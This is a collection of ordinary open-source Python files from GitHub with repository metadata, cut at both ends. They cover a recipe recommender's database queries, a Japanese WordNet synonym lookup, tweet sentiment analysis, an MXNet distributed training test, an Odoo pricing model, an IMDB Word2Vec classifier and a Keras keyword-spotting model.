type_=Numeric)],\n )\n recipes_sql = self.session.execute(query).fetchall()\n return recipes_sql\n\n def exact_recipe_match(self, search_term):\n \"\"\"\n DESCRIPTION:\n Return True if search_term is in recipes table of\n cur database, False otherwise.\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.recipes\n WHERE \"url\" = :search_term\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n if self.session.execute(query).fetchall():\n return True\n else:\n return False\n\n def content_based_search(self, search_term):\n \"\"\"\n DESCRIPTION:\n return the 200 most similar recipes to the url defined\n in based on cosine similarity in the \"categories\"\n space of the epicurious dataset.\n INPUT:\n search_term (str): url identifier for recipe (in recipes['url'])\n OUTPUT:\n results (dataframe): Recipe dataframe similar to recipes, but\n containing only the Nsim most similar recipes to the input.\n Also contains additional column \"similarity\".\n \"\"\"\n # Select recipe IDs of 200 most similar recipes to reference\n CS_ids = self.query_content_similarity_ids(search_term)\n\n # Also select the actual similarity scores\n CS = self.query_content_similarity(search_term)\n\n # Finally, select similar recipes themselves\n # Get only those columns I actually use to speed things up\n # Note that column names are actually different in sql and pandas\n # So if you want to adjust this, adjust both!\n # TODO: Make column names similar in pandas and sql!\n col_sel = [\n \"recipesID\",\n \"title\",\n \"ingredients\",\n \"rating\",\n \"calories\",\n \"sodium\",\n \"fat\",\n \"protein\",\n \"emissions\",\n \"prop_ing\",\n \"emissions_log10\",\n \"url\",\n \"servings\",\n \"index\",\n \"image_url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n ]\n recipes_sql = self.query_similar_recipes(CS_ids)\n\n # Obtain a dataframe for further processing\n results = pd.DataFrame(recipes_sql, columns=col_sel)\n\n # Add similarity scores to correct recipes (using recipesID again)\n temp = pd.DataFrame({\"CS_ids\": CS_ids, \"similarity\": CS})\n results = results.merge(\n temp, left_on=\"recipesID\", right_on=\"CS_ids\", how=\"left\"\n )\n\n # Assign data types (sql output might be decimal, should\n # be float!)\n numerics = [\n \"recipesID\",\n \"rating\",\n \"calories\",\n \"sodium\",\n \"fat\",\n \"protein\",\n \"emissions\",\n \"prop_ing\",\n \"emissions_log10\",\n \"index\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"similarity\",\n \"review_count\",\n ]\n strings = [\"title\", \"ingredients\", \"url\", \"servings\", \"image_url\"]\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n\n # Order results by similarity\n results = results.sort_values(by=\"similarity\", ascending=False)\n\n return results\n\n def search_recipes(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Does a free search for recipes based on user's search term. If an\n exact match exists, does a content based search and returns the\n resulting DataFrame.\n INPUT:\n search_term (str): Search term input by user into search bar\n N (int): Max number of results to return\n OUTPUT:\n df (pd.DataFrame): DataFrame with recipes as rows\n \"\"\"\n outp = self.free_search(search_term, N)\n\n if outp[0][2] == search_term:\n return self.content_based_search(search_term)\n\n col_names = [\n \"recipesID\",\n \"title\",\n \"url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"image_url\",\n \"ghg\",\n \"prop_ingredients\",\n \"rank\",\n ]\n\n results = pd.DataFrame(outp, columns=col_names)\n\n # Assign data types (sql output might be decimal, should\n # be float!)\n numerics = [\n \"recipesID\",\n \"perc_rating\",\n \"ghg\",\n \"prop_ingredients\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n ]\n strings = [\"title\", \"url\", \"image_url\"]\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n\n # Order results by rank / edit_dist\n results = results.sort_values(by=\"rank\", ascending=False)\n return results\n\n def query_all_recipe_emissions(self):\n \"\"\"\n DESCRIPTION:\n Retrieves emission scores from all recipes, their title and url.\n INPUT:\n None\n OUTPUT:\n df (pandas.DataFrame): With columns \"recipesID\", \"emissions\",\n \"emissions_log10\", \"url\", \"title\"\n \"\"\"\n query = self.session.query(\n Recipe.recipesID,\n Recipe.emissions,\n Recipe.emissions_log10,\n Recipe.url,\n Recipe.title,\n )\n return pd.read_sql(query.statement, self.session.bind)\n\n def query_cookbook(self, userID):\n \"\"\"\n DESCRIPTION:\n Creates a pandas dataframe containing all recipes the given\n user has liked / added to the cookbook.\n INPUT:\n userID (Integer)\n OUTPUT:\n cookbook (pd.DataFrame)\n \"\"\"\n query = text(\n \"\"\"\n SELECT u.\"userID\", u.username,\n l.created, l.rating,\n r.title, r.url, r.perc_rating, r.perc_sustainability,\n r.review_count, r.image_url, r.emissions, r.prop_ingredients,\n r.categories\n FROM users u\n JOIN likes l ON (u.username = l.username)\n JOIN recipes r ON (l.\"recipesID\" = r.\"recipesID\")\n WHERE u.\"userID\" = :userID\n ORDER BY l.rating\n \"\"\",\n bindparams=[bindparam(\"userID\", value=userID, type_=Integer)],\n )\n recipes = self.session.execute(query).fetchall()\n\n # Convert to DataFrame\n colsel = [\n \"userID\",\n \"username\",\n \"created\",\n \"user_rating\",\n \"title\",\n \"url\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"image_url\",\n \"emissions\",\n \"prop_ingredients\",\n \"categories\",\n ]\n results = pd.DataFrame(recipes, columns=colsel)\n\n # Assign data types\n numerics = [\n \"userID\",\n \"user_rating\",\n \"perc_rating\",\n \"perc_sustainability\",\n \"review_count\",\n \"emissions\",\n \"prop_ingredients\",\n ]\n strings = [\"username\", \"title\", \"url\", \"image_url\", \"categories\"]\n datetimes = [\"created\"]\n\n for num in numerics:\n results[num] = pd.to_numeric(results[num])\n for s in strings:\n results[s] = results[s].astype(\"str\")\n for dt in datetimes:\n results[dt] = pd.to_datetime(results[dt])\n\n return results\n\n def query_bookmarks(self, userID, urls):\n \"\"\"\n DESCRIPTION:\n For all recipes (given in list urls) check if it has\n been bookmarked by the user (return boolean list).\n INPUT:\n userID (Integer): userID from users table\n urls (List of strings): Url strings from recipes table\n OUTPUT:\n Pandas DataFrame with columns 'recipesID' and 'bookmarked'\n \"\"\"\n sql_query = (\n self.session.query(Recipe, Like)\n .join(Like, Like.recipesID == Recipe.recipesID, isouter=True)\n .filter(Like.userID == userID, Recipe.url.in_(urls))\n )\n df = pd.read_sql(sql_query.statement, self.session.bind)\n\n # I got 2 recipeID columns, keep only one!\n df = df.loc[:, ~df.columns.duplicated()]\n return df[[\"recipesID\", \"bookmarked\"]]\n\n def is_in_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Check if a recipe (given by url) is already in a user's\n cookbook (given by userID)\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n Boolean\n \"\"\"\n # Get recipesID\n recipe = Recipe.query.filter_by(url=url).first()\n if not recipe:\n return False\n\n # Query like entries\n like = Like.query.filter_by(userID=userID, recipesID=recipe.recipesID).first()\n if like:\n return True\n return False\n\n def add_to_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Creates a new entry in the likes table for a given user\n and recipe.\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n None\n \"\"\"\n if self.is_in_cookbook(userID, url):\n return \"Cookbook entry already exists\"\n # Get username and recipesID\n user = User.query.filter_by(userID=userID).first()\n recipe = Recipe.query.filter_by(url=url).first()\n\n # Create new like entry\n if user and recipe:\n like = Like(\n username=user.username,\n bookmarked=True,\n userID=userID,\n recipesID=recipe.recipesID,\n created=datetime.datetime.utcnow(),\n )\n self.session.add(like)\n self.session.commit()\n return \"Cookbook entry added successfully\"\n return \"UserID or recipe url invalid\"\n\n def remove_from_cookbook(self, userID, url):\n \"\"\"\n DESCRIPTION:\n Removes an existing entry in the likes table for a given\n user and recipe.\n INPUT:\n userID (Integer): userID from users table\n url (String): Url string from recipes table\n OUTPUT:\n String: Feedback message\n \"\"\"\n if self.is_in_cookbook(userID, url):\n recipe = Recipe.query.filter_by(url=url).first()\n like = Like.query.filter_by(\n userID=userID, recipesID=recipe.recipesID\n ).first()\n self.session.delete(like)\n self.session.commit()\n return \"Removed recipe from cookbook successfully\"\n return \"Recipe was not bookmarked to begin with\"\n\n def query_user_ratings(self, userID, urls):\n \"\"\"\n DESCRIPTION:\n Query all rows in likes table with the given userID\n for all elements in urls\n INPUT:\n userID (Integer): userID from users table\n urls (List of strings): Url strings from recipes table\n OUTPUT:\n df (pandas.DataFrame): Has columns [likeID, userID, recipesID,\n username, bookmarked, user_rating, created], can be empty.\n NOTE:\n A like entry may exist even if the user has not explicitly\n rated a recipe - it may only have been bookmarked\n \"\"\"\n recipesIDs = (\n self.session.query(Recipe.recipesID).filter(Recipe.url.in_(urls)).all()\n )\n likes_query = self.session.query(Like).filter(\n Like.userID == userID, Like.recipesID.in_(recipesIDs)\n )\n df = pd.read_sql(likes_query.statement, self.session.bind)\n df.rename(columns={\"rating\": \"user_rating\"}, inplace=True)\n return df\n\n def rate_recipe(self, userID, url, rating):\n \"\"\"\n DESCRIPTION:\n Add or update user rating to bookmarked recipe in DB.\n INPUT:\n userID (Integer): userID from users table\n url (String): Recipe url tag\n OUTPUT:\n None\n \"\"\"\n # Get recipeID\n recipeID = (\n self.session.query(Recipe.recipesID).filter(Recipe.url == url).first()\n )\n\n # Find relevant likes row\n like = Like.query.filter_by(userID=userID, recipesID=recipeID).first()\n\n # Like row found, modify\n if like:\n like.rating = rating\n self.session.commit()\n\n # Like row not found, create new like entry (without bookmark)\n else:\n user = User.query.filter_by(userID=userID).first()\n recipe = Recipe.query.filter_by(url=url).first()\n if user and recipe:\n like = Like(\n username=user.username,\n bookmarked=False,\n userID=userID,\n recipesID=recipe.recipesID,\n created=datetime.datetime.utcnow(),\n rating=rating,\n )\n self.session.add(like)\n self.session.commit()\n\n def delete_account(self, userID):\n \"\"\"\n DESCRIPTION:\n Removes an existing user entry from users table,\n and corresponding rows in consent and likes tables.\n INPUT:\n userID (Integer): userID from users table\n OUTPUT:\n String: Feedback message\n \"\"\"\n user = User.query.filter_by(userID=userID).first()\n if user:\n\n # delete likes of user (in likes table)\n Like.query.filter_by(userID=userID).delete()\n\n # delete consent of user (in consent table)\n Consent.query.filter_by(userID=userID).delete()\n\n # delete user (in users table)\n self.session.delete(user)\n self.session.commit()\n return \"Removed user account successfully\"\n return \"User not found. Nothing was removed.\"\n\n def change_newsletter_subscription(self, userID):\n \"\"\"\n DESCRIPTION:\n Negates current newsletter subscription status of user.\n INPUT:\n userID (Integer): userID from users table\n OUTPUT:\n String: Feedback message\n \"\"\"\n user = User.query.filter_by(userID=userID).first()\n if user:\n new_subscription_status = True\n if user.optin_news:\n new_subscription_status = False\n user.optin_news = new_subscription_status\n self.session.commit()\n if new_subscription_status:\n return 'Changed newsletter subscription to \"subscribed\"'\n return 'Changed newsletter subscription to \"unsubscribed\"'\n return \"User not found\"\n\n\n# eof\n","repo_name":"sbuergers/sustainable-recipe-recommender-website","sub_path":"application/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":22637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15175070921","text":"# -*- coding: utf-8 -*\n\"\"\" thesaurus.py\nこのスクリプトは, 日本語 WordNet のデータベースファイルから,\n特定の語の類義語を検索します\n\"\"\"\nfrom os import path\n\nclass WordNet(object):\n \"\"\"\n WordNet の DB ファイルに接続し,\n 種々の検索を行���クラスです.\n \"\"\"\n\n def __init__(self):\n from sqlite3 import connect\n thisdir = path.dirname(path.abspath('__file__'))\n dbfile = path.abspath(path.join(thisdir, 'var', 'wnjpn.db'))\n self.con = connect(dbfile)\n\n def get_wordid(self, word):\n \"\"\"\n 特定の語のワードIDを取得します\n \"\"\"\n sql = 'select * from word where lemma=\"{0}\";'.format(\n word\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synset(self, wordid):\n \"\"\"\n 特定のワードID が属する類似語 ID を取得します\n \"\"\"\n sql = 'select * from sense where wordid = {0};'.format(\n wordid\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synonym(self, synset, lang='eng'):\n \"\"\"\n 特定の synset から類義語を取得します\n \"\"\"\n sql = ' '.join(\n [\n 'select lemma from sense, word where synset=\"{0}\"'.format(\n synset\n ),\n 'and word.lang=\"{0}\"'.format(lang),\n 'and sense.wordid = word.wordid;'\n ]\n )\n return [row[0] for row in self.con.execute(sql)]\n\n def get_synonym_by_link(self, synset, link):\n \"\"\"\n 入力で与えられた synset ID から,\n 下位語や下位語を検索します\n\n ここで下位語を検索する場合には, link='hypo',\n 上位語を検索する場合には, link='hype' を入力してください.\n その他の関連に関しては, 以下のページの第四項を参照してください.\n\n - http://compling.hss.ntu.edu.sg/wnja/jpn/detail.html\n \"\"\"\n sql = ' '.join([\n 'SELECT lemma FROM synlink, sense, word',\n 'WHERE link =\"{0}\"'.format(link),\n 'AND synset1 = \"{0}\"'.format(synset),\n 'AND synset2 = synset',\n 'AND sense.wordid = word.wordid',\n 'AND word.lang=\"eng\";'\n ])\n return [row[0] for row in self.con.execute(sql)]\n\n\ndef get_synonym(word):\n \"\"\"\n 引数 word で指定した語の類義語を検索します\n \"\"\"\n synonyms = []\n wn = WordNet()\n wordids = wn.get_wordid(word)\n for i in wordids:\n synsetids = wn.get_synset(i)\n for synid in synsetids:\n synonyms.extend(wn.get_synonym(synid))\n synonyms = sorted(list(set(synonyms)))\n return synonyms\n\n\ndef get_synonym_by_link(word, link):\n \"\"\"\n 引数 word で指定した語の link で指定された関係語を検索します.\n \"\"\"\n synonyms = []\n wn = WordNet()\n wordids = wn.get_wordid(word)\n for i in wordids:\n synsetids = wn.get_synset(i)\n for synid in synsetids:\n synonyms.extend(wn.get_synonym_by_link(synid, link))\n synonyms = sorted(list(set(synonyms)))\n synonyms.pop(synonyms.index(word))\n return synonyms\n\n\n# vim 呼出用関数\ndef thesaurus_get_synonym(word):\n synonyms = get_synonym(word)\n for synonym in synonyms:\n print(\"{0}\".format(synonym))\n\n\nif __name__ == \"__main__\":\n from argparse import ArgumentParser\n desc = \"Shearch synonyms form args.\"\n PARSER = ArgumentParser(description=desc)\n PARSER.add_argument(\n \"words\",\n help=\"words you want to sherch.\",\n nargs='*'\n )\n link_help = ' '.join([\n \"type of word link, like hype or hypo.\",\n \"see cap.4 in http://compling.hss.ntu.edu.sg/wnja/jpn/detail.html\"\n ])\n PARSER.add_argument(\n \"--link\", \"-l\", help=link_help\n )\n ARGS = PARSER.parse_args()\n ARGS = PARSER.parse_args()\n for word in ARGS.words:\n print(\"# {0} を検索します.\".format(word))\n if ARGS.link:\n for synonym in get_synonym_by_link(word, ARGS.link):\n print(\"- {0}\".format(synonym))\n else:\n for synonym in get_synonym(word):\n print(\"- {0}\".format(synonym))\n","repo_name":"qh73xe/thesaurus.vim","sub_path":"src/thesaurus.py","file_name":"thesaurus.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74376498668","text":"#!/usr/bin/python3\nfrom textblob import TextBlob\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import sent_tokenize,word_tokenize\n\nf = open(\"/home/bhavyaagrawal/Desktop/tweets.txt\",\"r+\")\n\n# data redaing from file\ndata = f.read()\nprint(\"data @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \")\nprint(data)\n\n#clening the data by first tockenizing then removing stopwords\n\n# tokenize data as per words\ntoken_data = word_tokenize(data)\n\n\n# now remove unwanted or extra words from tockenized data\nfresh_data = [i for i in token_data if i not in stopwords.words('english')]\n#print(type(fresh_data)) its return type is list \n\n# plotting graph using top 20 most frequent words\nfreq_data = nltk.FreqDist(fresh_data)\nfreq_data.plot(20)\n\n#print(fresh_data)\n#fresh data is in form of list to convert it again into string\n\nclean_data = ' '.join(fresh_data)\nprint(\"clean_data ###################################################################\")\nprint(clean_data)\n\n# sentimental analysis on the data \nfor i in fresh_data:\n\tanalysing_data = TextBlob(i)\n\tsentiments = analysing_data.sentiment\n\tprint(sentiments)\n\tprint(type(sentiments))\t\n\tif sentiments.polarity == 0:\n\t\tprint(\"feelings are neutral\")\n\n\telif sentiments.polarity < 0:\n\t\tprint(\"feelings are negative\")\n\n\telif sentiments.polarity > 0:\n\t\tprint(\"feelings are positive\")\n\n\telse:\n\t\tprint(\"sentiments are not obtained correctly\")\t\n\t\n","repo_name":"Bhavya-Agrawal/NLP_Projects","sub_path":"Tweet_Analysis/sentiment_analysis_from_file.py","file_name":"sentiment_analysis_from_file.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"724455635","text":"import sys\nsys.path.insert(0, \"../../python/\")\nimport mxnet as mx\nimport numpy as np\nimport numpy.random as rnd\nimport time\n\ndef check_diff_to_scalar(A, x, rank=None):\n \"\"\" assert A == x\"\"\"\n assert(np.sum(np.abs((A - x).asnumpy())) == 0), (rank, A.asnumpy(), x)\n\n# setup\nkeys = ['3', '5', '7']\ninit_test_keys = [str(i) for i in range(200,300)]\ninit_test_keys_big = [str(i) for i in range(300,400)]\ninit_test_keys_device = [str(i) for i in range(400,500)]\ninit_test_keys_device_big = [str(i) for i in range(500,600)]\n\nrate = 2\nshape = (2, 3)\nbig_shape = (1200, 1200) # bigger than MXNET_KVSTORE_BIGARRAY_BOUND\n\nkv = mx.kv.create('dist_device_sync')\n\ndef init_kv():\n # init kv dns keys\n kv.init(keys, [mx.nd.ones(shape)] * len(keys))\n kv.init('99', mx.nd.ones(big_shape))\n # worker info\n my_rank = kv.rank\n nworker = kv.num_workers\n # init updater on servers\n kv.set_optimizer(mx.optimizer.create('test', rescale_grad=rate))\n return kv, my_rank, nworker\n\ndef test_sync_push_pull():\n kv, my_rank, nworker = init_kv()\n num_gpus = 2\n def check_default_keys(kv, my_rank, nworker):\n nrepeat = 3\n # checks pull after push in loop, because behavior during\n # consecutive pushes doesn't offer any guarantees\n for i in range(nrepeat):\n scale = my_rank + 1\n kv.push('3', [mx.nd.ones(shape, ctx=mx.gpu(j)) * scale for j in range(num_gpus)])\n kv.push('99', [mx.nd.ones(big_shape, ctx=mx.gpu(j)) * scale for j in range(num_gpus)])\n num = (nworker + 1) * nworker * rate * num_gpus / 2 * (i + 1) + 1\n val = mx.nd.zeros(shape)\n kv.pull('3', out=val)\n check_diff_to_scalar(val, num)\n val2 = mx.nd.zeros(big_shape)\n kv.pull('99', out=val2)\n check_diff_to_scalar(val2, num)\n\n check_default_keys(kv, my_rank, nworker)\n print('worker ' + str(my_rank) + ' is done')\n\ndef test_sync_init():\n def check_init(kv, cur_keys, cur_shape, device=False):\n ctx = mx.gpu(0) if device else mx.cpu()\n val = [mx.nd.zeros(cur_shape, ctx) for i in cur_keys]\n for i in range(len(cur_keys)):\n expected = i\n kv.init(cur_keys[i], [mx.nd.ones(cur_shape, ctx) * i])\n kv.pull(cur_keys[i], out=val[i])\n check_diff_to_scalar(val[i], expected)\n check_init(kv, init_test_keys, shape)\n check_init(kv, init_test_keys_big, big_shape)\n check_init(kv, init_test_keys_device, shape, device=True)\n check_init(kv, init_test_keys_device_big, big_shape, device=True)\n my_rank = kv.rank\n print('worker ' + str(my_rank) + ' is initialized')\n\nif __name__ == \"__main__\":\n test_sync_init()\n test_sync_push_pull()\n","repo_name":"hpi-xnor/BMXNet","sub_path":"tests/nightly/dist_device_sync_kvstore.py","file_name":"dist_device_sync_kvstore.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"38726333025","text":"from odoo import api, fields, models\n\n\nclass ProductAttributeValue(models.Model):\n\n _inherit = 'product.attribute.value'\n\n report_price_extra = fields.Float(\n 'Attribute Price Extra',\n compute='_compute_report_price_extra')\n\n @api.depends()\n def _compute_report_price_extra(self):\n \"\"\"\n \"\"\"\n product_tmpl_id = self._context.get('active_id', False)\n if not product_tmpl_id:\n return\n product_tmpl = self.env['product.template'].browse(product_tmpl_id)\n company, partner = self.env['res.partner'].get_company_partner()\n pricelist = self.env['product.pricelist'].browse(\n self._context.get('pricelist'))\n\n taxes_included = not partner._get_vat_discriminated(partner, company)\n ret = 'total_included' if taxes_included else 'total_excluded'\n if taxes_included:\n for rec in self:\n taxes = partner.property_account_position_id.map_tax(\n product_tmpl.sudo().taxes_id.filtered(\n lambda x: x.company_id == company))\n rec.report_price_extra = taxes.sudo().compute_all(\n rec.price_extra, pricelist.currency_id)[ret]\n else:\n for rec in self:\n rec.report_price_extra = rec.price_extra\n","repo_name":"royalline1/website","sub_path":"l10n_ar_website_sale/models/product_attribute_value.py","file_name":"product_attribute_value.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"42394454620","text":"import re\nimport time\nimport logging\n\nimport pandas as pd\nimport numpy as np\n\nfrom bs4 import BeautifulSoup\n\nimport nltk.data\n# nltk.download() # Download text data sets, including stop words\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\n\nfrom gensim.models import Word2Vec\n\n\ndef review_to_wordlist(review, remove_stopwords=False):\n # Function to convert a document to a sequence of words,\n # optionally removing stop words. Returns a list of words.\n #\n # 1. Remove HTML\n review_text = BeautifulSoup(review).get_text()\n #\n # 2. Remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\", \" \", review_text)\n #\n # 3. Convert words to lower case and split them\n words = review_text.lower().split()\n #\n # 4. Optionally remove stop words (false by default)\n if remove_stopwords:\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n #\n # 5. Return a list of words\n return words\n\n\ndef review_to_sentences(review, tokenizer, remove_stopwords=False):\n # Function to split a review into parsed sentences. Returns a\n # list of sentences, where each sentence is a list of words\n #\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(review.strip())\n\n # 2. Loop over each sentence and append them into one list\n sentences = []\n for raw_sentence in raw_sentences:\n if len(raw_sentence) > 0:\n sentences.append(review_to_wordlist(raw_sentence, remove_stopwords))\n\n return sentences\n\n\ndef makeFeatureVec(words, model, num_features):\n # Function to average all of the word vectors in a given paragraph\n # Pre-initialize an empty numpy array (for speed)\n vec_feature = np.zeros((num_features,), dtype=\"float32\")\n\n num_words = 0\n\n # Index2word is a list that contains the names of the words in\n # the model's vocabulary. Convert it to a set, for speed\n # here is model.wv.index2word\n index2word_set = set(model.wv.index2word)\n\n # if it is in the model's vocabulary,\n # add its feature vector to the total\n for word in words:\n if word in index2word_set:\n num_words += 1\n vec_feature = np.add(vec_feature, model[word])\n\n # Divide the result by the number of words to get the average\n vec_feature = np.divide(vec_feature, num_words)\n\n return vec_feature\n\n\ndef getAvgFeatureVecs(reviews, model, num_features):\n # Given a set of reviews (each one a list of words), calculate\n # the average feature vector for each one and return a 2D numpy array\n counter = 0\n\n # Preallocate a 2D numpy array, for speed\n reviewFeatureVecs = np.zeros((len(reviews), num_features), dtype=\"float32\")\n\n for review in reviews:\n if counter % 5000 == 0:\n print(\"Review %d of %d\" % (counter, len(reviews)))\n reviewFeatureVecs[counter] = makeFeatureVec(review, model, num_features)\n counter += 1\n\n return reviewFeatureVecs\n\n\nif __name__ == '__main__':\n # Read data\n train = pd.read_csv(\"./input_data/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n test = pd.read_csv(\"./input_data/testData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n unlabeled_train = pd.read_csv(\"./input_data/unlabeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n\n # Verify the number of reviews that were read (100,000 in total)\n # print(\"Read %d labeled train reviews, %d labeled test reviews, \"\n # \"and %d unlabeled reviews\\n\" % (train[\"review\"].size,\n # test[\"review\"].size,\n # unlabeled_train[\"review\"].size))\n\n # load the punctuation tokenizer\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n\n sentences = []\n print(\"Parsing sentences from training set\")\n for review in train[\"review\"]:\n # The difference between the \"+=\" and append()\n # If you are appending a list of lists to another list of lists,\n # append() will only append the first list,\n # you will need to use \"+=\" in order to join all of the lists at once\n sentences += review_to_sentences(review, tokenizer)\n\n print(\"Parsing sentences from unlabeled set\")\n for review in unlabeled_train[\"review\"]:\n sentences += review_to_sentences(review, tokenizer)\n\n # Check how many sentences we have in total\n # should be around 850,000+\n print(\"how many sentences we have %d\\n \" % len(sentences))\n\n print(sentences[0])\n\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n # Set values for various parameters\n num_features = 300 # Word vector dimensionality\n min_word_count = 40 # Minimum word count\n num_workers = 4 # Number of threads to run in parallel\n context = 10 # Context window size\n downsampling = 1e-3 # Downsample setting for frequent words\n\n # Initialize and train the model\n print(\"Training model...\")\n model = Word2Vec(sentences,\n workers=num_workers,\n size=num_features,\n min_count=min_word_count,\n window=context,\n sample=downsampling)\n\n # If you don't plan to train the model any further, calling\n # init_sims will make the model much more memory-efficient.\n model.init_sims(replace=True)\n\n # It can be helpful to create a meaningful model name and\n # save the model for later use. You can load it later using Word2Vec.load()\n model_name = \"300-features_40-min_word_10-context\"\n model.save(model_name)\n\n # Test the model\n # model = Word2Vec.load(\"300-features_40-min_word_10-context\")\n # model.doesnt_match(\"man woman child kitchen\".split())\n # model.doesnt_match(\"france england germany berlin\".split())\n # model.most_similar(\"man\")\n # model.most_similar(\"queen\")\n # model.most_similar(\"awful\")\n\n # Calculate average feature vectors for training and testing sets,\n # using the functions we defined above. Notice that we now use stop words removal.\n print(\"Creating average feature vectors for train reviews\")\n clean_train_reviews = []\n for review in train[\"review\"]:\n clean_train_reviews.append(review_to_wordlist(review, remove_stopwords=True))\n\n trainDataVecs = getAvgFeatureVecs(clean_train_reviews, model, num_features)\n\n print(\"Creating average feature vectors for test reviews\")\n clean_test_reviews = []\n for review in test[\"review\"]:\n clean_test_reviews.append(review_to_wordlist(review, remove_stopwords=True))\n testDataVecs = getAvgFeatureVecs(clean_test_reviews, model, num_features)\n\n forest = RandomForestClassifier(n_estimators=100)\n\n print(\"Fitting a random forest to labeled training data...\")\n forest = forest.fit(trainDataVecs, train[\"sentiment\"])\n\n # Test and extract results\n result = forest.predict(testDataVecs)\n\n output = pd.DataFrame(data={\"id\": test[\"id\"], \"sentiment\": result})\n\n output.to_csv(\"./output/Word2Vec_AverageVectors.csv\", index=False, quoting=3)\n\n start = time.time()\n word_vectors = model.wv.syn0\n num_clusters = int(word_vectors.shape[0] / 5)\n # print(word_vectors.shape)\n\n # Initialize a k-means object and use it to extract centroids\n kmeans_clustering = KMeans(n_clusters=num_clusters)\n idx = kmeans_clustering.fit_predict(word_vectors)\n\n end = time.time()\n elapsed = end - start\n print(\"Time take for K-Means clustering: %f seconds\" % elapsed)\n\n # # Create a Word / Index dictionary, mapping each vocabulary word to a cluster number\n # word_centroid_map = dict(zip(model.wv.index2word, idx))\n # # For the first 10 clusters\n # for cluster in range(0, 10):\n # # Print the cluster number\n # print(\"\\nCluster %d\" % cluster)\n #\n # # Find all of the words for that cluster number, and print them out\n # words = []\n # for i in range(0, len(word_centroid_map.values())):\n # if word_centroid_map.values()[i] == cluster:\n # words.append(word_centroid_map.keys()[i])\n # print(words)\n\n","repo_name":"dhr1676/Word2Vec-for-movie-reviews","sub_path":"Word2Vec_v1.py","file_name":"Word2Vec_v1.py","file_ext":"py","file_size_in_byte":8279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24310434658","text":"import math\nimport tensorflow as tf\n\nWINDOW_SIZE_MS = 20\nWINDOW_STRIDE_MS = 10\nSAMPLE_RATE = 16000\n\n\ndef prepare_model_settings(dct_coefficient_count):\n \"\"\"Calculates common settings needed for all models.\n\n Args:\n dct_coefficient_count: Number of frequency bins to use for analysis.\n\n Returns:\n Dictionary containing common settings.\n \"\"\"\n desired_samples = SAMPLE_RATE\n window_size_samples = int(SAMPLE_RATE * WINDOW_SIZE_MS / 1000)\n window_stride_samples = int(SAMPLE_RATE * WINDOW_STRIDE_MS / 1000)\n length_minus_window = (desired_samples - window_size_samples)\n spectrogram_length = 1 + int(length_minus_window / window_stride_samples)\n return {\n 'spectrogram_length': spectrogram_length,\n 'dct_coefficient_count': dct_coefficient_count\n }\n\n\ndef create_model(model_settings):\n # Loosely https://arxiv.org/abs/1703.05390\n input_frequency_size = model_settings['dct_coefficient_count']\n input_time_size = model_settings['spectrogram_length']\n\n # CNN part\n first_filter_count = 96\n first_filter_height = 8\n first_filter_width = 2\n first_filter_stride_y = 3\n first_filter_stride_x = 2\n\n model = tf.keras.Sequential()\n model.add(tf.keras.Input(shape=(input_time_size, input_frequency_size), name='fingerprint'))\n model.add(tf.keras.layers.Reshape((input_time_size, input_frequency_size, 1)))\n\n conv1 = tf.keras.layers.Conv2D(first_filter_count, kernel_size=(first_filter_height, first_filter_width),\n strides=(first_filter_stride_y, first_filter_stride_x), padding='valid', activation='relu', name='conv1', kernel_regularizer=tf.keras.regularizers.l2(0.001))\n model.add(conv1)\n\n first_conv_output_width = int(math.floor(\n (input_frequency_size - first_filter_width + first_filter_stride_x) /\n first_filter_stride_x))\n first_conv_output_height = int(math.floor(\n (input_time_size - first_filter_height + first_filter_stride_y) /\n first_filter_stride_y))\n\n # RNN part\n RNN_units = 3\n model.add(tf.keras.layers.Reshape(\n (first_conv_output_height, first_conv_output_width * first_filter_count)))\n 